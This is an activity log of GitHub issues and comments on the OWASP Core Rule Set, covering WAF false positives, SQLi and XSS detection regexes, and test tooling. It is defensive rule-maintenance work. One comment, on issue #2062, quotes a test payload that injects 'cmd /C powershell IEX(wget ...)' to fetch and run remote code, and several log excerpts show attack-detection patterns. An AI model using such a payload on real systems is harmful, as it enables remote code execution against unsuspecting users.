[2021-05-10 19:36] noneisland commented on #2071
Hi @lifeforms , thank you for your quick response.

I'm interested in contributing to fix the false positive if somebody can tell me how we build and test the changes to the coreruleset.

I discovered these false positives when using coreruleset with my application logs.

If somebody can give me some guidance, I probably will be able to fix these false positives quicker because they are a blocker

[2021-05-10 19:53] lifeforms commented on #2071
Normally you can just change the rule files in place, but in this case, it's a bit more complicated because rule 941130 is compressed from a series of regular expressions into one big regular expression. This helps us keep the number of rules lower and make processing faster while keeping related patterns in one rule.

The source regexps can be found in the file [regexp-941130.data](https://github

[2021-05-10 20:25] noneisland commented on #2071
hi @lifeforms , thanks for the information.

I am wondering if this can be made easier, e.g., "make testruleset" will automatically tell you if your changes succeeds or fails.

[2021-05-10 21:46] lifeforms commented on #2071
It's possible to run the tests with Docker but my setup is currently not working anymore so I hope someone else can pitch in on how to run the tests locally, @franbuehler ?

[2021-05-11 16:19] fzipi commented on #2071
Sure, it is possible.

You need python3, docker, and docker-compose installed.

The steps should be:
[code]

Will write a wiki page with this.

[2021-05-12 16:53] edwinvandeburgt opened #2073 "OData queries and FetchXML queries result in a lot of false positives, even for Paranoia Level 1"
We're using Microsoft Application Gateway with WAF enabled and the CRS 3.2 and see a lot of false positives when OData queries of FetchXML queries are included in the QueryString.

Is there a recommendation to disable some (which?) rules for these use cases?

[2021-05-12 17:03] lifeforms commented on #2073
Hi @edwinvandeburgt , definitely it is possible to make a small exclusion rule in the CRS that disables some checks only at certain points.

If you can share some of the modsec audit logs, that would be helpful.

[2021-05-12 18:11] edwinvandeburgt commented on #2073
Hi @lifeforms ,

Thanks for your quick reply.

Of course I could disable every FP that pops up, but I was looking for if someone already has a list for when OData and/or FetchXML is used.

I can't really share a modsec audit log, because I'm using Microsoft Application Gateway, which writes entries to LogAnalytics, containing the CRS rule and description and the url that triggered it, but nothing

[2021-05-13 11:26] #2043 closed

[2021-05-13 13:13] dune73 opened #2074 "Monthly Chat Agenda June (2021-06-07 and 2021-06-21)"
This is the Agenda for the Monthly CRS Chat.

The general chat is going to happen on https://owasp.slack.com in the channel #coreruleset on Monday, June 7, at 20:30 CET. That's the 1st Monday of the month. A separate issue chat is happening at the same location, same time on Monday, June 21. That's the 3rd Monday of the month. Please note that we have a [CRS calendar](https://calendar.google.com/c

[2021-05-14 21:10] noneisland commented on #2071
@fzipi , thanks for the instructions. I followed the guide and set it up. But in the last step, it doesn't appear that any tests were actually ran.

py.test -vs --tb=short tests/regression/CRS_Tests.py   --config="modsec2-apache"   --ruledir=./tests/regression/tests
======================================================================================================= test session starts =========

[2021-05-14 21:27] noneisland commented on #2071
I did some research. "xmlns" itself is not a XSS attack, it has to be combined with javascript in order to be an actual attack.
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

[2021-05-17 08:32] petskratt commented on #2066
I've had success with updating rules (one of them to be included after CRS):

`# exclude XSS-related rules that are triggered by HTML fragments
SecRuleUpdateTargetById "941100,941160" "!ARGS:/^acf\[field_.*$/"
# ... or exclude CRS completely
SecRuleUpdateTargetByTag "OWASP_CRS" "!ARGS:/^acf\[field_.*$/
`

[2021-05-17 11:05] Shajinraj opened #2075 "Rule: 942190: False positive 0202"
### Description

 [-:error] ModSecurity: Warning. Pattern match "(?i:(?:[\\"'`](?:;?\\\\s*?(?:having|select|union)\\\\b\\\\s*?[^\\\\s]|\\\\s*?!\\\\s*?[\\"'`\\\\w])|(?:c(?:onnection_id|urrent_user)|database)\\\\s*?\\\\([^\\\\)]*?|u(?:nion(?:[\\\\w(\\\\s]*?select| select @)|ser\\\\s*?\\\\([^\\\\)]*?)|s(?:chema\\\\s*?\\\\([^\\\\)]*?|elect.*?\\\\w?user\\\\()|in ..." at ARGS:q. [file "../../../corerule

[2021-05-17 11:11] Shajinraj opened #2076 "Rule: 942100 False positive 0202"
### Description

 [-:error] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'f(n)' [file "/../.. /coreruleset-3.4-dev/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "65"] [id "942100"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: f(n) found within ARGS:q: cos(accckt)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.0"] [tag "application-mul

[2021-05-17 13:39] azurit commented on #2075
Hi @Shajinraj! Thanks for reporting this. Can you, please, post a full request log? You can enable logging in `modsecurity.conf` using `SecAudit` directives.

[2021-05-17 15:51] dune73 commented on #2059
Closing this after it's been implemented by @lifeforms. Thank you.

[2021-05-17 15:51] #2059 closed

[2021-05-17 17:15] azurit commented on #2075
Ok, maybe it's not needed. If i'm looking correctly, this regexp from file `regexp-942190.data` is matching:
`user\s*?\([^\)]*?`

Maybe it can be rewritten into these two regexpes:
[code]

[2021-05-17 18:10] fzipi commented on #2062
Just to get you an update, I'm still running tests.

[2021-05-17 18:57] dune73 commented on #2073
@edwinvandeburgt would you mind sharing a screen shot what the LogAnalytics is sharing with you exactly? It would help to put your explanation in perspective (and help other users in the future).

[2021-05-17 19:06] lifeforms commented on #2069
Chat decision: Keeping this issue open for further development.

[2021-05-17 19:25] lifeforms commented on #2044
In order to modify the regexp, it is the same procedure that I described in https://github.com/coreruleset/coreruleset/issues/2071#issuecomment-837235485. After changing the source patterns, the compressed regexp has to be built.

I'm not exactly up to date on the proposed change but will be very interested to hear more.

[2021-05-17 19:31] lifeforms commented on #2060
I remember some heated conversations about `-->` with you @RubieV and yes finally I can agree that we move this pattern to Paranoia Level 2.

This is a great first issue as it's basically copying the existing rule into the Paranoia Level 2 section of the file (remembering to give it a new ruleId and giving it the `paranoia-level/2` tag) and moving the `-->` to that new rule, so we will assign it t

[2021-05-17 19:52] franbuehler commented on #2054
Hi @theMiddleBlue
You helped me with solving the issue reported by Amit Klein.

Current regex and coverage is: https://regex101.com/r/WolWP9/1
New proposal would be: https://regex101.com/r/vOG4RW/1

We see that with the word boundary we don't find both HTTP requests.
But to be honest, I don't know if the finding of the second HTTP request is enough. If yes, we can add the word boundary.

Can you h

[2021-05-18 07:43] theMiddleBlue commented on #2054
Hi,

thank you for the recap! I tried the new regex but it seems prone to similar false positives such as `(get it).\n`. Maybe to reduce FP in PL1 we should remove the `|[\r\n]` part from `(?:\s+http\/\d|[\r\n])`. Also, we can move a copy of the actual rule to PL2 to have a stricter rule? What do you think about it?

Thanks!

[2021-05-18 08:01] azurit commented on #2076
Thank you for reporting this. Unfortunately, it is not problem with CRS, but with Libinjection that provides this operator to ModSecurity and we have a rule that uses it.

I'm sorry, but I can only close this issue and tell you to visit https://github.com/client9/libinjection to submit your report.

If you are interested, you can upload full request log and i will help you creating an exlusion rul

[2021-05-18 08:01] #2076 closed

[2021-05-18 11:16] edwinvandeburgt commented on #2073
@dune73, sure.

The LogAnalytics query for an example request was:

`AzureDiagnostics
| where ResourceType == "APPLICATIONGATEWAYS" and OperationName == "ApplicationGatewayFirewall"
| where transactionId_g == "211809d7-1f01-8b99-c318-99556a620e25"
| project requestUri_s, Message, ruleId_s, ruleGroup_s, details_message_s, action_s, transactionId_g, serverStatus_s
`

The returned results:

![afbeeld

[2021-05-18 11:22] edwinvandeburgt commented on #2073
@dune73 , and we have the same false positives for OData queries:

![afbeelding](https://user-images.githubusercontent.com/27497969/118642501-b954df00-b7db-11eb-87cc-f03db3518d00.png)

/.../CustomerBankAccounts?%24filter=dataAreaId+eq+%27119%27+and+CustVendGuid+eq+d5115315-6385-eb11-a812-000d3adc5845+and+BankAccountId+eq+%270444285520%27

Are there some other recommendations for protecting API's i

[2021-05-18 11:29] edwinvandeburgt commented on #2073
@dune73 , of course there is more data in the AzureDiagnostics table, referring to the Resource etc.

The following is a list of OWASP related fields:

![afbeelding](https://user-images.githubusercontent.com/27497969/118643570-05545380-b7dd-11eb-832b-62d71ef00d8d.png)

[2021-05-18 11:42] theseion commented on #1942
Just to let you know: I haven't forgotten. I'm finishing up some other stuff and will start working on this ASAP.

[2021-05-18 12:00] dune73 commented on #2073
Thank you very much. This is very useful. You seem to be getting all the relevant infos about the request.

Conversion table:

| ModSec | Azure |
| -------|-------|
|    |     |
|    |     |
|    |     |
|    |     |

[2021-05-18 12:02] Shajinraj commented on #2075
As we are new to OWASP CRS, Could you please help us that we can modify the regexp-942190.data  and add the given fix or we need to add it an separate file as conf?

[2021-05-18 12:09] azurit commented on #2075
Edit file `rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf`, search for rule ID `942190` and change it's first line to this:
[code]

[2021-05-18 12:15] Shajinraj opened #2079 "Owasp crs 3.2 email validation request"
### Motivation

Email validation for the login screen to improve the security and only the users with username as mail id should be able to login.

Email ID syntax should only be possible.
Username with only name or number should be blocked.

### Proposed solution

When an user tries to login to a webpage, In front WAF should allow only the email ID users to login.

Application flow: Internet -->

[2021-05-18 12:26] azurit commented on #2079
Thank you very much for this feature request!

I think that login validation is work for an application, not a WAF.

Anyway, you can easily write such a rule and use it for your own. Check this:
https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual-(v2.x)
https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual-(v2.x)#rx

[2021-05-18 12:26] #2079 closed

[2021-05-18 12:34] dune73 commented on #2079
This is a typical security rule that you write yourself (or implement in the application as input validation).

You may want to check out my ModSec tutorial at https://www.netnea.com/cms/apache-tutorial-6_embedding-modsecurity/#step_8_writing_simple_whitelist_rules. In step 8, I am developing a rule set that features a rule that checks a username for it's format, only allowing usernames of a certa

[2021-05-18 12:36] dune73 commented on #2075
Please be aware that changing a rule file will prevent you from upgrading to a future version of the rule set.

It's usually better to address false positives with a rule exclusion. This technique is explained at length at https://www.netnea.com/cms/apache-tutorial-8_handling-false-positives-modsecurity-core-rule-set/

[2021-05-18 12:37] dune73 commented on #2075
Please be aware that changing a rule file will prevent you from upgrading to a future version of the rule set.

It's usually better to address false positives with a rule exclusion. This technique is explained at length at https://www.netnea.com/cms/apache-tutorial-8_handling-false-positives-modsecurity-core-rule-set/

I'm closing this issue in favor of the pull request at #2078.

[2021-05-18 12:37] #2075 closed

[2021-05-18 12:45] franbuehler commented on #2007
I've just seen that I already started with the PR here. Is it ok when I finish it and you take another one, @fzipi ??

[2021-05-18 12:50] dune73 commented on #2007
That must be a pleasant surprise. For me it's usually the other way around. I think I have started with a PR, but when I return to it, it was only a surreal fantasy.

[2021-05-18 12:51] franbuehler commented on #2007
I didn't finish it because I was not able to test it with FTW locally.
I think it's time to test https://github.com/fzipi/go-ftw??

[2021-05-18 12:51] fzipi commented on #2007
Sure. JFYI, I was adding more verbs in the file. This is what I addded:
[code]
I've realised that they looked like a small subset,  after taking a look at https://dev.mysql.com/doc/refman/5.7/en/non-typed-operators.html

[2021-05-18 12:53] franbuehler commented on #2007
Oh, wow, you started too! Sorry.
So, do you want to finish it and I'm trying to get your go-ftw up and running??

[2021-05-18 12:54] fzipi commented on #2007
Go ahead an try go-ftw!

I was on the writing tests stage ;)

[2021-05-18 12:57] franbuehler commented on #2007
I already had them. But I gave up with ftw :-(

[2021-05-18 13:33] fzipi opened #2081 "Change tests to be fully YAML only"
### Motivation

If we have only valid yaml tests, other tools like https://github.com/fzipi/go-ftw might be used for running tests.

### Proposed solution

We need only to patch our tests files to use valid yaml. This includes:

- changing all string lists to yaml text, using the yaml stanza: `data |`.
- using always the same type for status codes, in this case, a list of Int. So for now, even if

[2021-05-18 14:26] dune73 commented on #2060
Closing this in favor of PR at #2082.

Thank you for reporting @RubieV.

[2021-05-18 14:26] 53cur3M3 opened #2083 "Replace references to blacklist and whitelist with denylist and allowlist respectively"
### Motivation

The terms blacklist and whitelist are no widely recognised as causing offence.

### Proposed solution

Replace references to blacklist and whitelist with denylist and allowlist respectively

### Additional context

If this request / change was approved I'd be happy to fix these, and submit a Pull Request
There are a handful of references to blacklist and whitelist, documented below

[2021-05-18 15:02] edwinvandeburgt commented on #2073
It's generally missing from Azure, unfortunately.

[2021-05-19 05:04] azurit commented on #1905
@fgsch Are you still working on this? Thank you for info.

[2021-05-19 05:06] azurit commented on #1912
@lifeforms Are you still working on this? Thanks for info!

[2021-05-19 05:07] azurit commented on #1943
@franbuehler Did you have time to check if this is really related to 'your' issue https://github.com/coreruleset/coreruleset/issues/1942 ? Thanks for info!

[2021-05-19 08:15] dune73 commented on #2073
Thank you for the confirmation.

What a pity. I just wish these integrators, that charge money for their service (!), would do a better job at integrating CRS properly.

[2021-05-19 08:25] airween commented on #1917
See PR #2085.

[2021-05-19 08:26] dune73 commented on #2073
But now back to your initial question.

No, there is no general advice with regards to OData and FetchXML. At least not to our knowledge.

CRS can be used for API protection and it's maybe actually quite useful, yet the FP can be painful of course and on the native  ModSecurity engine, heavy API payloads can bring devastating performance numbers.

As you are aware, you are submitting XML in the qu

[2021-05-19 08:26] #2073 closed

[2021-05-19 08:29] dune73 commented on #1917
Closing this in favor of PR #2085.

[2021-05-19 08:34] dune73 commented on #1922
Closing in favor of PR #1958.

Thank you very much for reporting @tanvir-retailai. Sorry this is taking so long to fix. It's surprisingly difficult to do from a ModSecurity rules perspective.

[2021-05-19 08:34] #1922 closed

[2021-05-19 12:00] dune73 opened #2087 "Create wiki page with details on how to test"
As volunteered by @fzipi.

[2021-05-19 16:06] dune73 commented on #2073
You're welcome. Happy to help, especially if it's a new or intriguing question.

[2021-05-20 01:13] vibhasethi opened #2089 "Request to add files under WEB-INF to restricted-files.data"
Files under WEB-INF contain application configuration and files that should not be externally accessible. Creating this issue to request addition of following  in restricted-files.data.

WEB-INF/web.xml
WEB-INF/classes
WEB-INF/lib

[2021-05-20 08:06] dune73 opened #2091 "Rule 901410 uses @rx, when an @unconditionalMatch would work the same way"
Simple first issue saving a bit of performance (when using the Sampling Mode that is mainly about saving performance).

[2021-05-20 08:33] azurit commented on #2089
Hi @vibhasethi,

thank you for bringing this to our attention, i've already created a pull request which fixes this issue.

[2021-05-20 08:51] #2089 closed

[2021-05-20 09:17] fgsch commented on #1905
@azurit I'm planning to take a look at this tomorrow but feel free to take it if you want to work on it.

[2021-05-20 14:00] Shajinraj opened #2093 "Rule: 913100 False Positive 0202"
### Description

 [-:error] ********** client **********] ModSecurity: Warning. Match of "rx ^(?:urlgrabber/[0-9\\\\.]+ yum/[0-9\\\\.]+|mozilla/[0-9\\\\.]+ ecairn-grabber/[0-9\\\\.]+ \\\\(\\\\+http://ecairn.com/grabber\\\\))$" against "REQUEST_HEADERS:User-Agent" required. [file ../../coreruleset-3.4-dev/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "54"] [id "913100"] [msg "Found User-Agent as

[2021-05-20 14:41] azurit commented on #2093
Hi,

you are accessing your site using software which is associated with security scanners (zgrab). What software it is?

[2021-05-20 14:44] Shajinraj commented on #2093
Hi ,

We are accessing the site only through the browser!

[2021-05-20 14:46] azurit commented on #2093
This isn't a browser:
`User-Agent: mozilla/5.0 zgrab/0.x`

https://github.com/zmap/zgrab

[2021-05-20 14:49] Shajinraj commented on #2093
http-user-agent string
    	Set a custom HTTP user agent (default "Mozilla/5.0 zgrab/0.x")

We are using only the browsers to access, Could you please help with this and what changes we need to implement?

[2021-05-20 14:51] 53cur3M3 commented on #2093
As the rule you reported is matching zgrab in the user-agent string you could just set http-user-agent to just "Mozilla/5.0" or pretty much anything else to avoid this rule being triggered.

[2021-05-20 14:57] Shajinraj commented on #2093
No , Am not sure what do you mean.

Is that I need to make some conf changes in crs.conf?

[2021-05-20 15:56] 53cur3M3 commented on #2091
Would you like me to submit a pull request for this, or leave this as a first issue for someone else?

[2021-05-20 20:19] vibhasethi commented on #2089
Thank you!

[2021-05-21 08:20] azurit commented on #2091
@53cur3M3 It would be cool if you'll send a PR, thank you!

[2021-05-21 08:40] 53cur3M3 commented on #2091
I intially made this simple change... but then wondered if the sampling mode rules could be made more efficient still, the likelihood of not getting two integers out of a hex-encoded sha1 string is statistically highly improbable, so I came up with the following which reduces the number of regexes. I'm assuming that a length comparison is more efficient than a regex match:

`SecRule TX:sampling_pe

[2021-05-21 08:42] 53cur3M3 commented on #2091
sorry for above code copy & paste fail - hasn't rendered newlines

[2021-05-21 08:51] azurit commented on #2091
Don't worry, i fixed it.

[2021-05-21 09:12] azurit commented on #2091
If i understand it correctly, you are replacing rules 901410, 901420, 901430 and 901440 with your 901410, are you?

[2021-05-21 09:17] 53cur3M3 commented on #2091
@azurit , yes that's correct (or replacement of 901410-901440 with revised 901410 and 901420 - if we did want to keep fallback to duration).

[2021-05-21 09:27] dune73 commented on #2091
When I did this code year's ago I wanted to make it perfect. I traded simplicity and performance for perfection, while admitting in the comments that the randomness is far from perfect (but good enough for sampling).

With more distance, I think @53cur3M3 is right in favoring simplicity and performance over perfection (that can not be achieved here).

Just to add a bit perspective: The whole durat

[2021-05-21 10:48] issuesreporting opened #2095 "Error 403 when saving settings at /wp-admin/index.php?page=aioseo-setup-wizard#/category"
path:
example.com/wp-admin/index.php?page=aioseo-setup-wizard#/category

Clicking save button causes endless animation of button without any further visual results or changes.
Log file of modsecurity reports error 403
Log file of accesslog reports error 403

[code]

### Environment

CRS version (e.g., v3.2.0): 3.30
* Paranoia level setting: 1
* ModSecurity version (e.g., 2.9.3):  3
* Web Server an

[2021-05-21 10:54] dune73 commented on #2095
Thank you for reporting @issuesreporting.

I confirm your finding:

[code]

This call triggers rule 930120: OS File Access Attempt.

[2021-05-21 11:06] issuesreporting commented on #2095
Thank you for confirmation. Is there any sort of additional information I can support you with that may be helpful?

[2021-05-21 11:13] dune73 commented on #2095
Yes, your audit log reports an anomaly score of 100 in rule 949110, yet the log only brings a single alert on 930120 that in a normal installation accounts for an anomaly score of 5. Did you remove rule alerts that account for remaining anomaly score of 95?

[2021-05-21 12:47] issuesreporting commented on #2095
additionally backend log of httpd reports following
[code]

[2021-05-21 13:14] dune73 commented on #2095
Thank you. But this is the expected repetition of the rule alert 949110 above. It does not say how you end up with a score of 100.

Would you mind grepping for `162160010976.027469` in the backend log? That should return every rule alert triggered by this request.

[2021-05-21 15:59] issuesreporting commented on #2095
I would like to make a correction, I see that I wrote about backend, but in reality it was frontend log file. The line presented in previous post.

As for other information - only that from modsecurity log is present. No more files of any sort, unless I'm missing something out.
Exactly
[code]

[2021-05-22 09:05] theseion opened #2096 "Volume definitions in docker-compose.yml don't work out of the box with new `docker compose`"
### Describe the bug

Running `docker compose up modsec2-apache` produces an error due to a "bad" bind mount definition.

### Steps to reproduce

1. clone the repository
2. `cd` into the repository
3. run `docker compose --project-directory tests up modsec2-apache` -> error
4. run `docker-compose --project-directory tests up modsec2-apache` -> works fine

### Expected behaviour

I realize that thi

[2021-05-22 09:31] azurit commented on #2096
Thanks for reporting this!

Maybe I misunderstood you, so correct me if i'm wrong: Isn't this a bug in `docker compose`?

[2021-05-22 09:34] theseion commented on #2096
Yes, you are correct, this is a bug in `docker compose`. However, I don't know when this will be fixed and I suspect many people will be using `docker compose` regardless and then run into this issue. I've opened this issue in the hopes that we can change the setup so that both invocations can work to make it easier for new contributors to get started.

[2021-05-22 11:17] fzipi commented on #2096
@theseion Works perfect for me (macOS 11.3.1):
[code]

Using `--project-directory`:
[code]

¯\_(ツ)_/¯

[2021-05-22 11:20] theseion commented on #2096
Well, it doesn't for me :) Did you use a fresh clone? Because the command will work when the directories for the mount exist (the `logs/*` directories specifically).

[2021-05-22 14:52] fzipi commented on #2096
That is a good explanation. Will take a second look.

[2021-05-23 12:57] fzipi commented on #2096
With that one, seems to fail:
[code]

[2021-05-23 12:58] theseion commented on #2096
Yes, that's the one. 👍

[2021-05-23 12:59] fzipi commented on #2096
We can go two different paths here:
- add an empty `logs/` directory, only to workaround this temporary failure.
- document it, and move forward until docker fixes this

[2021-05-23 13:04] theseion commented on #2096
We'd have to add all of `logs/modsec2-apache/apache2` and `logs/modsec3-nginx/nginx` but yes, that would be the simplest solution. When we do this, we could also make an adaptation to change the log paths to `/var/log/modsec2-apache` and `/var/log/modsec3-nginx`. That would remove the unnecessary extra directory layer and we would only have to create `logs/modsec2-apache` and `logs/modsec3-nginx`.

[2021-05-24 13:06] fzipi commented on #2087
Created https://github.com/coreruleset/coreruleset/wiki/Testing-the-ruleset

Let me know if that works for you!

[2021-05-24 13:10] fzipi360 commented on #2096
The problem with changing it like that is that you need a different directory for storing the `modsec_audit.log` file. That's why I've created the additional directory.
[code]

[2021-05-24 14:33] lifeforms commented on #1917
Closing this in favor of PR #2100.

Thanks to Airween's version change utility added in #2085, version changes are now super easy and safe to make, which prevents bugs such as in #2009.

[2021-05-24 14:33] #1917 closed

[2021-05-24 14:33] franbuehler commented on #2044
Hi @noneisland

Do you have any updates here?

[2021-05-24 15:07] #2054 closed

[2021-05-24 15:21] franbuehler commented on #2044
Or does @flo405 have any updates?

[2021-05-24 18:32] theseion commented on #2096
I see. It works for apache but the NGiNX version used in the image has been compiled with that log directory hard coded. There are ways around that but they aren't really worth the effort. Well, it would have been nice but isn't too bad.

In that case let's create those directories?

[2021-05-24 18:43] fzipi commented on #2096
Sure.

If want to create also an issue in the modsecurity-docker for the nginx log directory, please go ahead!

[2021-05-24 19:39] theseion commented on #2096
I've opened #2103. Note that I moved the logs up one directory anyway because I think it is annoying. Instead, I opted to create the `nginx` directory, which will be populated with an `error.log` file by NGiNX but which we can simply ignore. I can understand if you don't like this setup. Let me know.

In addition, I added README files to the empty directories. Git will not (easily) store empty dir

[2021-05-27 05:58] vibhasethi opened #2105 "Rule id: 930100 does not check for Single dot directory and semicolon"
Rule id 930100 for Directory Traversal Attacks does not check for single dot directory and semicolon

Related CVE:
1. Path equivalence (/./) Single dot directory - https://cwe.mitre.org/data/definitions/55.html

Directory Traversal using Semicolon:
Apache Tomcat Semicolon Directory Traversal Vulnerability - https://www.rapid7.com/db/vulnerabilities/http-apache-tomcat-semicolon-dir-traversal/

[2021-05-27 06:19] airween commented on #2105
Hi @vibhasethi,

thanks for the spotting! We will investigate this issue soon.

[2021-05-28 18:58] theseion commented on #1942
@franbuehler I've opened a [PR](#2107). Could you take a look?

[2021-05-28 22:26] Schroeffu opened #2108 "False Positive Seafile (Nextcloud alternative) Upload File"
### Description

Seafile is an open source alternative to Nextcloud (and way more stable(!) + blazing fast ;) written in python/django, the CRS 3.3.0 is hitting false positives when uploading a file bigger than 3-5MB and also when trying to delete files.

I did resolve the issue by:

_(updated as mentioned, putting DELETE in SecAction id 900200 rule)_

[code]

### Audit Logs / Triggered Rule Numbe

[2021-05-29 07:15] airween commented on #2108
Hi @Schroeffu,

first, thanks for your report.

A quick response to your issues:

this is a [known](https://github.com/SpiderLabs/ModSecurity/issues/652) [issue](https://github.com/SpiderLabs/ModSecurity/issues/1804) in [mod_security](https://github.com/SpiderLabs/ModSecurity/issues/2021), and there is an unapplied [fix](https://github.com/SpiderLabs/ModSecurity/pull/2193). This is not a CRS issue

[2021-05-29 12:07] #2007 closed

[2021-05-29 12:16] fzipi commented on #2087
I'm closing this one. If you feel there are additional questions or stuff not covered, please let me know.

[2021-05-29 12:17] #2087 closed

[2021-05-29 18:55] #2096 closed

[2021-05-31 08:38] dune73 opened #2109 "Sort out FPs around Matomo cookies"
### Description

Matomo is known to issue cookies with differring names containing JSON code that triggers multiple FPs:

### Example alerts

[code]

### Affected cookies
* REQUEST_COOKIES:_pk_ref.1.3104
* REQUEST_COOKIES:_pk_ref.8.df83
* REQUEST_COOKIES:_pk_ref.7.b420
* REQUEST_COOKIES:_pk_ref.12.5f8e
* REQUEST_COOKIES:_pk_ref.13.3b4d

### Affected rules
* 932200 PL2 RCE Bypass Technique
* 942200

[2021-06-01 06:24] franbuehler commented on #1942
Thank you @theseion!! Yes, I'll take a look.

[2021-06-01 08:11] dune73 commented on #2109
@franbuehler : Do you have example alert messages / payloads for the rules you mentioned? I listed the rules, but I have not triggered them so far.

[2021-06-01 09:14] azurit commented on #2109
@dune73 How would you like to sort this out?

[2021-06-01 10:44] lifeforms commented on #1912
It turns out that the PHP Sybase extension is deprecated. The `sybase_foo()` functions are no longer avaiable in PHP 7.x.

I found an old machine running PHP 5.6 and was able to install the sybase extension there. I could not find a Sybase server to download, it's deprecated. But I can try to produce a warning. It comes in the following format:

[code]

On the CLI the format is:

[code]

So we cou

[2021-06-01 11:49] dune73 commented on #2109
I'd like to have payloads that trigger all the rules in question first. Then we can look into it. If it's only `""","""`, then I am confident we can avoid the FPs on the rules level.

What do you think?

[2021-06-02 11:03] franbuehler commented on #2109
@dune73, yes, I actually still have :-)

In short:

**942370 - PL2**:
`"Matched Data: \\x22\\x22,\\x22\\x22 found within REQUEST_COOKIES:_pk_ref.8.df83: [\\x22\\x22,\\x22\\x22,1573642916,\\x22https://*.*.ch/*/\\x22]"`

**942490 - PL3**:
`"Matched Data: \\x22\\x22,\\x22\\x22,15 found within REQUEST_COOKIES:_pk_ref.8.df83: [\\x22\\x22,\\x22\\x22,1573642916,\\x22https://*.*.ch/*/\\x22]"`

**942200 -

[2021-06-02 16:07] dune73 commented on #2109
Thank you @franbuehler.

[2021-06-02 20:20] fzipi commented on #2062
Well.. don't know what to say by now. I've been trying to get this test to actually work, but I think it doesn't match the rule.

Went to the site that says this one was taken from (): pattern for test should be `d=1;2;3;4;5\n1;@SUM(1+1)*cmd|' /C powershell IEX(wget 0r.pe/p)'\!A0;3`.

But this is never going to match rule 932100, because it is a Windows RCE attack. It matches 932200 for example. T

[2021-06-02 22:34] Schroeffu commented on #2108
Hi @airween sorry didn't have the time yet, will come back here asap with an update

[2021-06-03 02:49] NiceYouKnow opened #2110 "942190 regular suspected error"
### Describe the bug
The "\wiif\s*?\()" part of the 942190 rule may be wrong; I checked the usage of SQL Server's "iif" function, but did not find a match with "\wiif\s*?\()" The structure of, maybe the original idea was "\Wiif\s*?\()"!

### Steps to reproduce

### Expected behaviour

### Actual behaviour

### Additional context

### Your Environment
CRS version v3.4/dev

* CRS version (e.g., v3.2

[2021-06-03 09:56] franbuehler commented on #2110
Thank you for reporting this issue!!

When I have a look at the rule, the msg says:
"Detects MSSQL code execution and information gathering attempts."

So Microsoft docs (https://docs.microsoft.com/en-us/sql/t-sql/functions/logical-functions-iif-transact-sql?view=sql-server-ver15) say the syntax is:
`IIF( boolean_expression, true_value, false_value )`

You're right, the `\w`, the word character, i

[2021-06-03 11:33] NiceYouKnow commented on #2110
In order to avoid false alarms, I think "(?i)\Wiif\s*?(.+?)" is more appropriate. The harm caused by false alarms to the production environment is huge! What do you think?
For the selection of "\b" and "\W", I prefer to use "\W".

[2021-06-03 11:58] franbuehler commented on #2110
You're right. Ok, so let's do (if no opposing opinions are added here):

`\Wiif\s*?\(.+?\)`

The ignore case statement is inserted in the resulting rule, so we don't have to add it again:
`"@rx (?i:(?:[\"'`](?:;?\s*?(?:un.......`

Do you want to open I PR or shall I open one?

[2021-06-03 12:08] NiceYouKnow commented on #2110
Thank you for your reminder, I submit a PR.

[2021-06-03 14:52] #2053 closed

[2021-06-04 10:12] NiceYouKnow opened #2113 "942120 regular suspected error"
### Describe the bug
The "not\s+between\s+0\s+and" part of the 942120 rule may be wrong. I checked the related usage of between, the official description of MSSQL https://docs.microsoft.com/zh-cn/sql/t-sql/language-elements/between-transact-sql?view=sql-server-ver15, there is no clear requirement that "0" must appear; I also tried to use the "between" statement on MySQL, such as: _select * from us

[2021-06-04 11:06] franbuehler commented on #2113
Hi @NiceYouKnow!

Thank you for this report. We'll investigate this shortly.

[2021-06-04 11:12] NiceYouKnow commented on #2110
Hi @franbuehler，on PR fix_#2110, prompt message "First-time contributors need a maintainer to approve running workflows". What should I do?

[2021-06-04 12:03] franbuehler commented on #2113
Well spotted! Also with this issue here you're right. The first value after between does not necessarily has to be 0.
But in the source file we see that this 0 has to be there: `not\s+between\s+0\s+and`:
https://github.com/coreruleset/coreruleset/blob/v3.4/dev/util/regexp-assemble/regexp-942120.data#L16

Expression can be a number, can contain a `'` or `-` like  you tested.
So your resulting regex

[2021-06-04 12:09] NiceYouKnow commented on #2113
Thank you for your approval, I will  provide a PR later, but I have to enjoy my dinner first, it's dinner time here~ : )

[2021-06-04 12:12] franbuehler commented on #2113
Oh, yeah, sure! Enjoy your meal :-)

And I slightly changed your regex from `not\s+between\s+[\d'\"\-]+\s+and` to `not\s+between\s+[\d'"-]+\s+and`.
The `"` and `-` don't have to be escaped here.

[2021-06-04 12:38] NiceYouKnow commented on #2113
Hi @franbuehler , We must know that in the structure of rules,` "`is used as the regular boundary, for example:
`SecRule ARGS "@rx (?i)not\s+between\s+[\d'\"\-]+\s+and"`
If not escaped, Will become：
`SecRule ARGS "@rx (?i)not\s+between\s+[\d'"-]+\s+and"`
Rule structure will be destroyed！
But `-` don't have to be escaped here.
So we can use `not\s+between\s+[\d'\"-]+\s+and`.
What do you think?

[2021-06-04 17:36] franbuehler commented on #2113
Yes, you're right.

[2021-06-04 20:47] ar-daniel opened #2114 "application/x-git-upload-pack-request - content type is not allowed by policy"
### Description

Setup - gitea (git server running at localhost) behind nginx
Tried to do git clone in command line - received 403 error
(works without modsecurity).

From the audit log i believe the issue is - Request content type is not allowed by policy
application/x-git-upload-pack-request.
Moreover I'm able to download the git repo from the gitea web interface as a zip file. (guess it might h

[2021-06-04 21:38] fzipi commented on #2114
Hi @ar-daniel !

Please take a look at your `crs-setup.conf` file. This is configurable for your reality. See [here in the example](https://github.com/coreruleset/coreruleset/blob/155d2294f373b03dcc1d379974914b876c1e09f1/crs-setup.conf.example#L421):
[code]

So you just need to uncomment that line, and add your allowed content types.

[2021-06-04 21:39] fzipi commented on #1991
I will take care of this one.

[2021-06-05 07:41] ar-daniel commented on #2114
Thank you very much, this worked.

I hadn't known the setting can be overridden, least how to override it.
Is there docs on manual configuration you would suggest.?

with some search, I've found these
https://www.netnea.com/cms/nginx-modsecurity-tutorials/
https://www.netnea.com/cms/nginx-tutorial-8_handling-false-positives-modsecurity-core-rule-set/
